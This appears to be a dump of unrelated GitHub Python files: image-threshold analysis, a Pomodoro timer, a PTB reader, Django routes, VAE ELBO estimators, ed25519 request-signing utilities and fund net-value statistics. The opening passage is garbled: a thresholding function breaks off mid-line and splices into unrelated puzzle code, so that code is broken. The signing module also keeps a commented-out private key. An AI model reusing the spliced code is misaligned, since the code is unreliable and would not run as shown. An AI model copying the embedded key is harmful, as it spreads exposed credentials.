mean circularity\n    pool = Pool(cpu_count())\n    circ_all = np.squeeze(np.array([pool.map(partial(circularity, A=A, SIZE=SIZE), thresh_all)]), axis=0)\n    pool.close()\n    pool.join()\n\n    # Fit a polynomial and find optimum threshold where circularity measures are greater than 1\n    # func = np.polyfit(thresh_all[circ_all>0], circ_all[circ_all>0], 2)\n    # yfit = np.poly1d(func)\n    # print yfit(thresh_all[circ_all>0])\n\n    plot = False\n    if plot:\n        plt.figure()\n        plt.plot(thresh_all, circ_all, 'xb')\n        plt.plot(thresh_all[circ_all>0], yfit(thresh_all[circ_all>0]), '-r')\n        plt.savefig('/Users/gm515/Desktop/test/fig.png')\n\n    #T = thresh_all[np.where(yfit(thresh_all[circ_all>0]) == np.max(yfit(thresh_all[circ_all>0])))]\n    T = thresh_all[np.argmax(circ_all>0.8)]\n\n    # If threshold from fit is less than minimum threshold limit, set optimum threshold to minimum\n    if Ti-z:\n            return \"impossible\"\n        temp=(i-arr[i]-z)+arr[z]\n        if temp None:\n        self.capacity = capacity\n    \n    def fill_tank(self, fill_amount) -> None:\n        if self.is_full(): return\n        self.holding += fill_amount\n    \n    def is_full(self)->bool:\n        return self.holding >= self.capacity\n    \n    def __str__(self) -> str:\n        rounded_holding = Decimal(self.holding).quantize(Decimal('0.1'), rounding=decimal.ROUND_HALF_UP)\n        rounded_holding = str(rounded_holding)\n        big_num,little_num = list(map(int, rounded_holding.split('.')))\n        big_num = big_num*10\n        numerator = big_num + little_num\n        greatest_common_denominator = gcd(numerator, 10)\n        numerator = int(numerator/greatest_common_denominator)\n        denominator = int(10/greatest_common_denominator)\n        return f'{numerator}/{denominator}' if denominator > 1 else str(numerator)\nfor _ in range(int(input())):\n    fuel_available, tank_count = list(map(int,input().split()))\n    tank_capacities = list(map(int,input().split()))\n    tank_objects = [tank(tank_capacities[idx]) for idx in range(tank_count)]\n\n    while fuel_available > 0:\n        for tank_object in tank_objects:\n            if not tank_object.is_full(): fuel_available -= 0.01\n            tank_object.fill_tank(0.01)\n    \n    tank_objects = list(map(str, tank_objects))\n    print(' '.join(tank_objects))\n    \n    \n","repo_name":"Chenzo46/Coding-problems","sub_path":"bankruptOnFuel.py","file_name":"bankruptOnFuel.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42386525492","text":"import argparse\n\n\ndef create_parser():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('filename', type=argparse.FileType(mode='rt'), help='file name')\n\n    return parser\n\n\ndef main():\n    parser = create_parser()\n    args = parser.parse_args()\n    count = 0\n    for _ in args.filename:\n        count += 1\n    print(count)\n\n\nif __name__ == '__main__':\n    main()","repo_name":"nstrashevskii/py_110_for_git","sub_path":"prac_3/file_len.py","file_name":"file_len.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33849345215","text":"# 100 Days of Code: Python\n# May 22, 2022\n# Pomodoro app with tkinter\n# Effective time management work timer\n\n# Import modules\nfrom tkinter import *\nimport math\n\n# Constants\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\n\n# Function for timer reset\ndef reset_timer():\n    global reps\n    reps = 0\n    check_marks.config(text=\"\")\n    timer_label.config(text=\"Timer\", 
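# [Editor's aside] A minimal, self-contained sketch of the circularity measure that
# circthresh() above scans over thresholds: binarize at one threshold, label the
# regions, and score each region with 4*pi*area/perimeter**2 (1.0 for a perfect
# disk), matching the document's circfunc. The synthetic image and the min_size
# bound are illustrative assumptions, not values from the original pipeline.
import math
import numpy as np
from skimage.measure import label, regionprops

rng = np.random.default_rng(0)
img = rng.normal(100, 10, (64, 64))
img[20:30, 20:30] += 80  # one bright, roughly square "cell"

def mean_circularity(image, thresh, min_size=10):
    labeled = label((image > thresh).astype(int))
    circ = [4 * math.pi * r.area / r.perimeter ** 2
            for r in regionprops(labeled) if r.area > min_size and r.perimeter > 0]
    return np.mean(circ) if circ else 0.0

print(mean_circularity(img, 150))  # close to 1 for the compact square region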
fg=GREEN)\n    canvas.itemconfig(timer_text, text=\"00:00\")\n    window.after_cancel(timer)\n\n# Function for timer mechanism\ndef start_timer():\n    global reps\n    reps += 1\n\n    work_sec = WORK_MIN * 60\n    short_break_sec = SHORT_BREAK_MIN * 60\n    long_break_sec = LONG_BREAK_MIN * 60\n\n    # long break every 8th rep, short break after other even reps, otherwise work:\n    if reps % 8 == 0:\n        timer_label.config(text=\"Break\", fg=RED)\n        count_down(long_break_sec)\n    elif reps % 2 == 0:\n        timer_label.config(text=\"Break\", fg=PINK)\n        count_down(short_break_sec)\n    else:\n        timer_label.config(text=\"Work\", fg=GREEN)\n        count_down(work_sec)\n    num_marks = math.floor(reps / 2)\n    marks_list = []\n    for m in range(num_marks):\n        marks_list.append(\"✔\")\n    check_marks.config(text=\"\".join(marks_list))\n\n# Function for timer countdown\ndef count_down(count):\n    count_min = math.floor(count / 60)\n    count_sec = count % 60\n    if count_sec < 10:\n        count_sec = f\"0{count_sec}\"\n\n    canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n    if count > 0:\n        global timer\n        timer = window.after(1000, count_down, count - 1)\n    else:\n        start_timer()\n\n# UI setup\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\ntomato_img = PhotoImage(file=\"tomato.png\")\ncanvas.create_image(100, 112, image=tomato_img)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(column=2, row=2)\n\ntimer_label = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 40, \"bold\"))\ntimer_label.grid(column=2, row=1)\n\nstart_button = Button(text=\"Start\", highlightthickness=0, command=start_timer)\nstart_button.grid(column=1, row=3)\n\nreset_button = Button(text=\"Reset\", highlightthickness=0, command=reset_timer)\nreset_button.grid(column=3, row=3)\n\ncheck_marks = Label(fg=GREEN, bg=YELLOW)\ncheck_marks.grid(column=2, row=4)\n\n# Window controls\nwindow.mainloop()","repo_name":"gdbecker/100DaysOfCodePython","sub_path":"02 - Intermediate/Day 028 - Pomodoro App/PomodoroApp.py","file_name":"PomodoroApp.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6604540926","text":"# coding=utf-8\nimport requests\nimport re\n\n#url = 'http://10.10.0.244:10080/dsp/config/v2/getFrequencyTree'\nuri = \"http://122.112.251.59:20090\"\n\nurl = \"%s/api/v1/call-account\"%uri #/api/v1/get-account-status?account=330100b002\nheader = {\"content-type\": 'application/json; charset=UTF-8',\n          \"User-Agent\":\"Mozilla/5.0 \",\n          \"x-xzl-appkey\": \"appkey12\"\n          }\n\n\ndata = {\n    \"talktype\":1,\n    \"passwd\":\"123456\",\n    \"priority\":22\n}\n\n\n\nstart = 100000\nend = 100001\nwhile start < end:\n    aa = format(start, \"0>4\")\n    ac = \"3301%s2\" % aa\n    data[\"account\"] = ac\n    response = requests.post(url, json=data, headers=header)\n    print(response.status_code, response.json())\n    start += 1\n","repo_name":"zq0324/zq","sub_path":"demo_interface_test/testResquests.py","file_name":"testResquests.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23192896765","text":"from django.conf.urls import include, url\nfrom views import index, play, pause, stop, seek, current_playing, upload_file\n\nurlpatterns = [\n    url(r'^$', index),\n    url(r'^play/(?P[a-zA-Z0-9\\.\\-]+)', play),\n    url(r'^pause', pause),\n    url(r'^stop', stop),\n    
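# [Editor's aside] The Pomodoro app above drives its countdown with window.after()
# rather than time.sleep(), so the Tk event loop stays responsive and the pending
# callback can be cancelled with after_cancel(). A minimal sketch of that pattern
# in isolation (the 5-second count is an arbitrary assumption):
import tkinter as tk

root = tk.Tk()
label = tk.Label(root, text="5")
label.pack()

def tick(count):
    label.config(text=str(count))
    if count > 0:
        # re-schedule ourselves once per second; no blocking, no threads
        root.after(1000, tick, count - 1)

tick(5)
root.mainloop()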
url(r'^seek/(?P[\\d]+)', seek),\n url(r'^current_playing', current_playing),\n url(r'^upload', upload_file)\n]\n","repo_name":"Vizualni/hometv","sub_path":"hometvapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15668240469","text":"import copy\nimport torch\nimport numpy as np\n\n__all__ = ['elbo_subset', 'elbo_mm']\n\n\ndef elbo_subset(model, x, y, mask, num_samples=1, k=1, p=0.5):\n elbo = 0\n for _ in range(k):\n mask_q = copy.deepcopy(mask)\n for n, row in enumerate(mask):\n row_q = copy.deepcopy(row)\n data_idx = torch.where(row == 1)[0]\n to_remove = np.random.binomial(len(data_idx) - 1, p=p)\n remove_idx = np.random.choice(data_idx.numpy(), size=[to_remove],\n replace=False)\n\n row_q[remove_idx] = 0\n mask_q[n, :] = row_q\n\n elbo += model.elbo(x, y, mask, mask_q, num_samples)\n\n return elbo\n\n\ndef elbo_mm(model, x, y, mask, num_samples, k, p=0.5):\n \"\"\"Monte Carlo estimate of the evidence lower bound from the Multimodal\n VAE.\"\"\"\n elbo = model.elbo(x, y, mask, num_samples=num_samples)\n\n elbos_n = 0\n for n in range(y.shape[1]):\n mask_q = copy.deepcopy(mask)\n mask_q[:, n] = 0\n elbos_n += model.elbo(x, y, mask, mask_q, num_samples)\n\n elbos_k = 0\n for _ in range(k):\n mask_q = copy.deepcopy(mask)\n for n, row in enumerate(mask):\n row_q = copy.deepcopy(row)\n data_idx = torch.where(row == 1)[0]\n to_remove = np.random.binomial(len(data_idx)-1, p=p)\n remove_idx = np.random.choice(data_idx.numpy(), size=[to_remove],\n replace=False)\n\n row_q[remove_idx] = 0\n mask_q[n, :] = row_q\n\n elbos_k += model.elbo(x, y, mask, mask_q, num_samples)\n\n elbo += elbos_n + elbos_k\n\n return elbo\n","repo_name":"MattAshman/sgpvae","sub_path":"sgpvae/utils/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"11383350319","text":"import base64\nimport datetime\nimport re\nimport uuid\n\nimport nacl.encoding\nimport nacl.hash\nimport json\nfrom nacl.bindings import crypto_sign_ed25519_sk_to_seed\nfrom nacl.signing import SigningKey, VerifyKey\n\nfrom main.config import get_config_by_name\nfrom main.models.subscriber import subscriber_type_mapping\n\n\ndef hash_message(msg: str):\n hasher = nacl.hash.blake2b\n digest = hasher(bytes(msg, 'utf-8'), digest_size=64, encoder=nacl.encoding.Base64Encoder)\n digest_str = digest.decode(\"utf-8\")\n return digest_str\n\n\ndef create_signing_string(digest_base64, created=None, expires=None):\n signing_string = f\"\"\"(created): {created}\n(expires): {expires}\ndigest: BLAKE-512={digest_base64}\"\"\"\n return signing_string\n\n\ndef sign_response(signing_key, private_key):\n private_key64 = base64.b64decode(private_key)\n seed = crypto_sign_ed25519_sk_to_seed(private_key64)\n signer = SigningKey(seed)\n signed = signer.sign(bytes(signing_key, encoding='utf8'))\n signature = base64.b64encode(signed.signature).decode()\n return signature\n\n\ndef verify_response(signature, signing_key, public_key):\n try:\n public_key64 = base64.b64decode(public_key)\n VerifyKey(public_key64).verify(bytes(signing_key, 'utf8'), base64.b64decode(signature))\n return True\n except Exception:\n return False\n\n\ndef get_filter_dictionary_or_operation(filter_string):\n filter_string_list = re.split(',', filter_string)\n filter_string_list = [x.strip(' ') for x in filter_string_list] # to remove 
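# [Editor's aside] The elbo_subset/elbo_mm estimators above build a "query" mask by
# randomly dropping observed entries from each row: np.random.binomial chooses how
# many of the observed indices to remove (always leaving at least one, since it
# draws from len(data_idx) - 1 trials) and np.random.choice picks which ones. A
# standalone sketch of that row operation (the example row and p are assumptions):
import numpy as np

np.random.seed(0)
row = np.array([1, 0, 1, 1, 0, 1])           # 1 = observed entry
data_idx = np.where(row == 1)[0]
to_remove = np.random.binomial(len(data_idx) - 1, p=0.5)
remove_idx = np.random.choice(data_idx, size=[to_remove], replace=False)
row_q = row.copy()
row_q[remove_idx] = 0
print(row, "->", row_q)                      # row_q keeps a non-empty subset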
white spaces from list\n filter_dictionary_or_operation = dict()\n for fs in filter_string_list:\n splits = fs.split('=', maxsplit=1)\n key = splits[0].strip()\n value = splits[1].strip()\n filter_dictionary_or_operation[key] = value.replace(\"\\\"\", \"\")\n return filter_dictionary_or_operation\n\n\ndef create_authorisation_header(request_body, created=None, expires=None):\n created = int(datetime.datetime.now().timestamp()) if created is None else created\n expires = int((datetime.datetime.now() + datetime.timedelta(hours=1)).timestamp()) if expires is None else expires\n signing_key = create_signing_string(hash_message(json.dumps(request_body, separators=(',', ':'))),\n created=created, expires=expires)\n signature = sign_response(signing_key, private_key=get_config_by_name(\"BAP_PRIVATE_KEY\"))\n\n subscriber_id = get_config_by_name(\"BAP_ID\")\n unique_key_id = get_config_by_name(\"BAP_UNIQUE_KEY_ID\")\n header = f'Signature keyId=\"{subscriber_id}|{unique_key_id}|ed25519\",algorithm=\"ed25519\",created=' \\\n f'\"{created}\",expires=\"{expires}\",headers=\"(created) (expires) digest\",signature=\"{signature}\"'\n return header\n\n\ndef verify_authorisation_header(auth_header, request_body_str, public_key):\n header_parts = get_filter_dictionary_or_operation(auth_header.replace(\"Signature \", \"\"))\n created = int(header_parts['created'])\n expires = int(header_parts['expires'])\n current_timestamp = int(datetime.datetime.now().timestamp())\n if created <= current_timestamp <= expires:\n signing_key = create_signing_string(hash_message(request_body_str), created=created, expires=expires)\n return verify_response(header_parts['signature'], signing_key, public_key=public_key)\n else:\n return False\n\n\ndef generate_key_pairs():\n signing_key = SigningKey.generate()\n private_key = base64.b64encode(signing_key._signing_key).decode()\n public_key = base64.b64encode(bytes(signing_key.verify_key)).decode()\n return private_key, public_key\n\n\ndef sign_registry_request(request):\n req_obj = []\n req_obj.append(request.get('country')) if request.get('country') else None\n req_obj.append(request.get('domain')) if request.get('domain') else None\n req_obj.append(request.get('type')) if request.get('type') else None\n req_obj.append(request.get('city')) if request.get('city') else None\n req_obj.append(request.get('subscriber_id')) if request.get('subscriber_id') else None\n\n signing_string = \"|\".join(req_obj)\n return sign_response(signing_string, private_key=get_config_by_name(\"BAP_PRIVATE_KEY\"))\n\n\ndef format_registry_request_for_pre_prod(request, vlookup=False):\n request['type'] = subscriber_type_mapping[request['type']]\n if vlookup:\n signature = sign_registry_request(request)\n return {\n \"sender_subscriber_id\": get_config_by_name(\"BAP_ID\"),\n \"request_id\": str(uuid.uuid4()),\n \"timestamp\": datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3]+\"Z\",\n \"search_parameters\": request,\n \"signature\": signature\n }\n else:\n return request\n\n\nif __name__ == '__main__':\n request_body1 = 
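# [Editor's aside] The helpers above wrap PyNaCl's ed25519 primitives. Stripped of
# the ONDC header formatting, the essential round trip is just sign-then-verify;
# this sketch mirrors generate_key_pairs()/sign_response()/verify_response() using
# only documented PyNaCl calls (the message bytes are an assumption):
import base64
from nacl.signing import SigningKey, VerifyKey
from nacl.exceptions import BadSignatureError

signer = SigningKey.generate()
message = b"request body"
signature = signer.sign(message).signature        # 64-byte detached signature

verifier = VerifyKey(bytes(signer.verify_key))
try:
    verifier.verify(message, signature)           # raises BadSignatureError on tamper
    print("ok:", base64.b64encode(signature)[:16], b"...")
except BadSignatureError:
    print("invalid signature")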
{\"context\":{\"domain\":\"nic2004:60212\",\"country\":\"IND\",\"city\":\"Kochi\",\"action\":\"search\",\"core_version\":\"0.9.1\",\"bap_id\":\"bap.stayhalo.in\",\"bap_uri\":\"https://8f9f-49-207-209-131.ngrok.io/protocol/\",\"transaction_id\":\"e6d9f908-1d26-4ff3-a6d1-3af3d3721054\",\"message_id\":\"a2fe6d52-9fe4-4d1a-9d0b-dccb8b48522d\",\"timestamp\":\"2022-01-04T09:17:55.971Z\",\"ttl\":\"P1M\"},\"message\":{\"intent\":{\"fulfillment\":{\"start\":{\"location\":{\"gps\":\"10.108768, 76.347517\"}},\"end\":{\"location\":{\"gps\":\"10.102997, 76.353480\"}}}}}}\n # os.environ[\"BAP_PRIVATE_KEY\"] = \"lP3sHA+9gileOkXYJXh4Jg8tK0gEEMbf9yCPnFpbldhrAY+NErqL9WD+Vav7TE5tyVXGXBle9ONZi2W7o144eQ==\"\n # os.environ[\"BAP_PUBLIC_KEY\"] = \"awGPjRK6i/Vg/lWr+0xObclVxlwZXvTjWYtlu6NeOHk=\"\n # private_key1, public_key1 = generate_key_pairs()\n # os.environ[\"BAP_PRIVATE_KEY\"] = private_key1\n # os.environ[\"BAP_PUBLIC_KEY\"] = public_key1\n auth_header1 = create_authorisation_header(request_body1)\n print(auth_header1)\n print(verify_authorisation_header(auth_header1, request_body1))\n","repo_name":"ONDC-Official/py-protocol-layer","sub_path":"webserver/main/utils/cryptic_utils.py","file_name":"cryptic_utils.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"45108687135","text":"import collections\nimport os\nimport tensorflow as tf\n\n\ndef _read_words(filename):\n with tf.gfile.GFile(filename, \"r\") as f:\n return f.read().decode(\"utf-8\").replace(\"\\n\", \"\").split()\n\n\ndef _build_vocab(filename):\n data = _read_words(filename)\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n return word_to_id\n\n\ndef _file_to_word_ids(filename, word_to_id):\n data = _read_words(filename)\n return [word_to_id[word] for word in data if word in word_to_id]\n\n\ndef ptb_raw_data(data_path=None):\n train_path = os.path.join(data_path, \"ptb.train.txt\")\n valid_path = os.path.join(data_path, \"ptb.valid.txt\")\n test_path = os.path.join(data_path, \"ptb.test.txt\")\n\n word_to_id = _build_vocab(train_path)\n train_data = _file_to_word_ids(train_path, word_to_id)\n valid_data = _file_to_word_ids(valid_path, word_to_id)\n test_data = _file_to_word_ids(test_path, word_to_id)\n vocabulary = len(word_to_id)\n return train_data, valid_data, test_data, vocabulary\n\n\ndef ptb_producer(raw_data, batch_size, num_steps, name=None):\n with tf.name_scope(name, \"PTBProducer\", [raw_data, batch_size, num_steps]):\n raw_data = tf.convert_to_tensor(raw_data, name=\"raw_data\", dtype=tf.int32)\n data_len = tf.size(raw_data)\n batch_len = data_len // batch_size\n data = tf.reshape(raw_data[0 : batch_size * batch_len],\n [batch_size, batch_len])\n epoch_size = (batch_len - 1) // num_steps\n assertion = tf.assert_positive(\n epoch_size,\n message=\"epoch_size == 0, decrease batch_size or num_steps\")\n with tf.control_dependencies([assertion]):\n epoch_size = tf.identity(epoch_size, name=\"epoch_size\")\n i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()\n x = tf.strided_slice(data, [0, i * num_steps],\n [batch_size, (i + 1) * num_steps])\n x.set_shape([batch_size, num_steps])\n y = tf.strided_slice(data, [0, i * num_steps + 1],\n [batch_size, (i + 1) * num_steps + 1])\n y.set_shape([batch_size, num_steps])\n return x, 
y\n","repo_name":"GPrathap/sound_classifier","sub_path":"try/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10706559765","text":"class Hexagon():\n def __init__(self, a, b, c, d, e, f):\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n self.e = e\n self.f = f\n print(\"Created!\")\n\n def calculate_perimeter(self):\n return self.a + self.b + self.c + self.d + self.e + self.f\n\nhex1 = Hexagon(1,1,1,1,1,1)\n\nprint(hex1.calculate_perimeter())\n\n","repo_name":"GuyChapGH/calthoff","sub_path":"object-oriented/challenge_oop_1_4.py","file_name":"challenge_oop_1_4.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32127610721","text":"bloques = int(input(\"Ingrese el Numero de bloques: \"))\n\naltura = 0\ncapas = 1 # Altura se basa en las capas completas usadas por los bloques, es decir que los capas se incrementa en 1\n # + -> capas = 1\n # ** -> capas + 1 = 2\n # *** -> capas + 1 = 3\nbase = 0\n\nwhile altura < bloques: # El altura no puede ser mayor a los bloques, por logica.\n bloques -= capas # Las capas restan a los bloques, ya que las capas contienen bloques\n altura += 1 # La altura son las capas completas\n capas += 1\n base += 1\nelse:\n if bloques != 0:\n base += 1\n\nprint(\"La Base de la piramide es \"+ str(base))\nprint(\"La altura de la piramide es \"+str(altura))","repo_name":"Chess10/PYTHON","sub_path":"FUNDAMENTOS DE PROGRAMACION/1. Fundamentos Basicos/EJERCICIOS/Altura de una Piramide.py","file_name":"Altura de una Piramide.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"503013077","text":"import os\nfrom controllers import CategoryController, \\\n InOutProductVariableController, \\\n ProductController, \\\n ProductImageController, \\\n ProductVariableController, \\\n ProductVariableValueController, \\\n VariableValueController\n\nif __name__ == \"__main__\":\n root_path = os.getcwd()\n\n # Lấy thông tin các danh mục cần thiết\n print(\"Lấy thông tin các danh mục cần thiết\")\n category_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_category.xlsx\",\n \"sheet\": \"category\"\n }\n\n variable_value_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_variable-value.xlsx\",\n \"sheet\": \"variable-value\"\n }\n\n category_controller = CategoryController(category_file[\"path_full\"], category_file[\"sheet\"])\n variable_value_controller = VariableValueController(variable_value_file[\"path_full\"], variable_value_file[\"sheet\"])\n\n # Đọc thông tin từ file excel cần import\n print(\"Đọc thông tin từ file excel cần import\")\n product_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_san-pham.xlsx\",\n \"sheet\": \"san-pham\"\n }\n product_variable_file = {\n \"path_full\": root_path + \"\\\\import_excel\\\\20180619_bien-the.xlsx\",\n \"sheet\": \"bien-the\"\n }\n\n product_controller = ProductController(product_file[\"path_full\"], product_file[\"sheet\"], category_controller)\n product_image_controller = ProductImageController(product_controller)\n product_variable_controller = ProductVariableController(product_variable_file[\"path_full\"],\n product_variable_file[\"sheet\"],\n product_controller)\n product_variable_value_controller = 
ProductVariableValueController(product_variable_controller,\n                                                                       variable_value_controller)\n    in_out_product_variable_controller = InOutProductVariableController(product_controller,\n                                                                        product_variable_controller,\n                                                                        variable_value_controller)\n\n    # Update the main table's information from the secondary tables\n    print(\"Update the main table's information from the secondary tables\")\n    product_controller.update_product_variable(product_variable_controller.product_parents)\n\n    # Export the SQL import files\n    print(\"Export the SQL import files\")\n    category_controller.export_sql()\n    variable_value_controller.export_sql()\n    product_controller.export_sql()\n    product_image_controller.export_sql()\n    product_variable_controller.export_sql()\n    product_variable_value_controller.export_sql()\n    in_out_product_variable_controller.export_sql()\n\n    print(\"Program finished\")","repo_name":"tranthaibinh111/MySqlToSqlServer","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13846018240","text":"# Python Course - PDTI-SENAC/RN\n# Prof. Weskley Bezerra\n# Mitchell Oliveira\n# 06/08/2020\n# --------------------------------------------------------------\n# Write a program that reads a vector of 10 real numbers and displays them in reverse order.\n\nnumeros = []\n\nfor indice in range(1,11):\n    numero = input(f\"Enter number {indice}: \")\n    numero = float(numero)  # the task asks for real numbers, so parse floats\n    numeros.append(numero)\n\nnumeros.reverse()  # reverse the input order (sorting descending was a bug)\n\nprint(numeros)","repo_name":"mitchelloliveira/python-pdti","sub_path":"Aula04_06082020/aula04_exe02.py","file_name":"aula04_exe02.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28809659812","text":"import numpy as np\nimport pandas as pd\nfrom pandas.testing import assert_series_equal\n\nfrom chalet.preprocess.od_pairs_helpers import get_unknown_sites\nfrom tests.preprocess.stub_data import get_stub_nodes, get_stub_od_pairs\n\n\ndef test_id_partially_equal_nan():\n    \"\"\"Test for get_unknown_sites with node id partially equal to nan\"\"\"\n    nodes = get_stub_nodes()\n    nodes[\"ID\"] = 2 * [np.nan] + [3, 4]\n    od_pairs = get_stub_od_pairs()\n    expected = pd.Series([1, 2])\n\n    actual = get_unknown_sites(od_pairs, nodes)\n\n    assert_series_equal(actual, expected)\n\n\ndef test_id_equal_nan():\n    \"\"\"Test for get_unknown_sites with node id equal to nan\"\"\"\n    nodes = get_stub_nodes()\n    nodes[\"ID\"] = np.nan\n    od_pairs = get_stub_od_pairs()\n    expected = pd.Series([1, 2, 3, 4], index=[0, 1, 2, 5])\n\n    actual = get_unknown_sites(od_pairs, nodes)\n\n    assert_series_equal(actual, expected)\n\n\ndef test_no_unknown_sites():\n    \"\"\"Test for get_unknown_sites with no unknown sites\"\"\"\n    nodes = get_stub_nodes()\n    od_pairs = get_stub_od_pairs()\n\n    result = get_unknown_sites(od_pairs, nodes)\n\n    assert len(result) == 0\n","repo_name":"amzn/chalet-charging-location-for-electric-trucks","sub_path":"src/tests/preprocess/od_pairs_helpers/test_get_unknown_sites.py","file_name":"test_get_unknown_sites.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"17294611774","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\"\"\"\nThis script aggregates summary information for the custodied products.\nInput: 副本产品净值.xlsx\nOutput: 托管产品汇总.xlsx\n\"\"\"\n\n### Import the required libraries\nimport pandas as pd\nfrom pandas import Series\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport 
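# [Editor's aside] The chalet tests above lean on pandas' testing helpers, which
# compare values, dtype and index, and treat positionally matched NaNs as equal,
# unlike a naive (s1 == s2).all(). A tiny self-contained illustration of why the
# tests use assert_series_equal for NaN-bearing expectations:
import numpy as np
import pandas as pd
from pandas.testing import assert_series_equal

s1 = pd.Series([1.0, np.nan, 3.0])
s2 = pd.Series([1.0, np.nan, 3.0])
assert_series_equal(s1, s2)            # passes: NaNs compare equal positionally
print((s1 == s2).all())                # False: elementwise NaN != NaN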
os\nimport time\nfrom WindPy import w\npath = os.getcwd()\nos.chdir(path)\n\n### Define the helper functions\ndef theround(value,n=4):\n    \"\"\"\n    theround truncates value (a float) to n decimal places\n    \"\"\"\n    return(int(value*10**n)/10**n)\n\ndef max_drawdown(netvalue):\n    \"\"\"\n    max_drawdown computes the maximum drawdown of the series\n    \"\"\"\n    \n    maxhere = [] # running maximum up to the current point\n    drawdown = [] # drawdown at the current point\n    for i in range(len(netvalue)):\n        temp = netvalue[0:(i+1)]\n        maxheretemp = max(temp)\n        drawdowntemp = netvalue[i]/maxheretemp - 1\n        drawdowntemp = drawdowntemp*(-1)\n        maxhere.append(maxheretemp)\n        drawdown.append(drawdowntemp) \n    maxdrawdown = max(drawdown)\n    maxdrawdown = maxdrawdown*100\n    maxdrawdown = theround(maxdrawdown)\n    return(maxdrawdown)\n    \n\n# Function to compute the return volatility\ndef volatility(netvalue):\n    \"\"\"\n    :param netvalue: net value series (list)\n    :return: the annualized return volatility over the backtest period\n    \"\"\"\n    rtn = []\n    for i in range((len(netvalue) - 1)):\n        temp1 = netvalue[i]\n        temp2 = netvalue[(i+1)]\n        rtntemp = temp2/temp1 - 1\n        rtn.append(rtntemp)\n    \n    from math import sqrt\n    # compute the volatility\n    vol = np.std(rtn)* sqrt(250)\n    vol = vol*100\n    vol = theround(vol)\n    return(vol)\n    \n# Function to compute beta\ndef beta(netvalue1, netvalue2):\n    \"\"\"\n    :param netvalue1: the product's net value series\n    :param netvalue2: the index's net value series\n    :return: the beta value\n    \"\"\"\n    return_line = []\n    indexreturn_line = []\n    for i in range((len(netvalue1) - 1)): # -1 so the (i+1) lookahead stays in range\n        return_line.append(netvalue1[(i+1)]/netvalue1[i] - 1)\n        indexreturn_line.append(netvalue2[(i+1)]/netvalue2[i] - 1)\n    df = pd.DataFrame({ 'rtn': return_line, 'benchmark_rtn': indexreturn_line})\n    # covariance of account and benchmark returns divided by the variance of benchmark returns\n    b = df['rtn'].cov(df['benchmark_rtn']) / df['benchmark_rtn'].var()\n    return(b)\n\n    \n    \n\n# Read CSI 300 index data from Wind\nw.start()\nHS300 = w.wsd(\"000300.SH\",\"close\",'20160101','20161223')\nHS300Data = HS300.Data\nHS300Times = HS300.Times\n\nHS300Data = HS300Data[0]\n#HS300Data = pd.DataFrame(HS300.Data)\n\n#print(max_drawdown(HS300Data))\n\n\n#HS300Close = HS300.Data\n#print(HS300Close)\n\n#print(HS300)\n\n# Read in the data\nAllNetValueData = pd.read_excel('副本产品净值.xlsx','SQL Results',index_col = None, na_values=['NA'])\nAllProduct = np.unique(AllNetValueData['VC_CPMC'])\nprint(AllProduct)\n\nresult = pd.DataFrame(AllProduct,columns = ['产品名称'],index = AllProduct)\nprint(result)\nfor Product in AllProduct:\n    #print(Product)\n    NetValueData = 